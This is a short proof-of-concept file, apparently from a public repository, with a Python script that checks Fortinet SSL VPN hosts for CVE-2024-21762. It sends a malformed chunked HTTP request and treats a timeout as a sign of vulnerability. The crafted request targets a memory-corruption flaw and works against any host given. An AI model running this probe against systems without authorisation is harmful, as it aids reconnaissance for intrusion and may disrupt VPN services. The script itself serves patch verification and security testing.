wy876_POC/Fortinet-SSL-VPN-CVE-2024-21762.md

Fortinet-SSL-VPN-CVE-2024-21762

poc

import socket
import ssl
import sys
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname=False
context.verify_mode=ssl.CERT_NONE

# should be fine for most hosts, increase this if you're getting errors.
TIMEOUT=5

def send_req(host, req):
    try:
        s=socket.create_connection(host, timeout=5)
    except: return -1
    ss=context.wrap_socket(s)
    ss.send(req)
    try:
        return ss.read(2048)
    except socket.timeout:
        return 0

control_req="""POST /remote/VULNCHECK HTTP/1.1\r
Host: {}\r
Transfer-Encoding: chunked\r
\r
0\r
\r
\r
"""

check_req="""POST /remote/VULNCHECK HTTP/1.1\r
Host: {}\r
Transfer-Encoding: chunked\r
\r
0000000000000000FF\r
\r
"""
def check(host):
    baseurl="https://{}:{}".format(*host)
    r1=send_req(host, control_req.format(baseurl).encode())
    if r1==-1:
        return "Connection Failed"
    if r1==0:
        return "Control request failed"
        return
    if b"HTTP/1.1 403 Forbidden" not in r1:
        print("[warning] Server does not look like a Fortinet SSL VPN interface")
    r2=send_req(host, check_req.format(baseurl).encode())
    if r2==0: return "Vulnerable"
    else: return "Patched"

if __name__=="__main__":
    try:
        host=sys.argv[1]
        port=int(sys.argv[2])
    except:
        print("Usage: check-cve-2024-21762.py <host> <port>")
        exit()
    HOST=(host,port)
    print(check(HOST))

python3 check-cve-2024-21762.py <host> <port>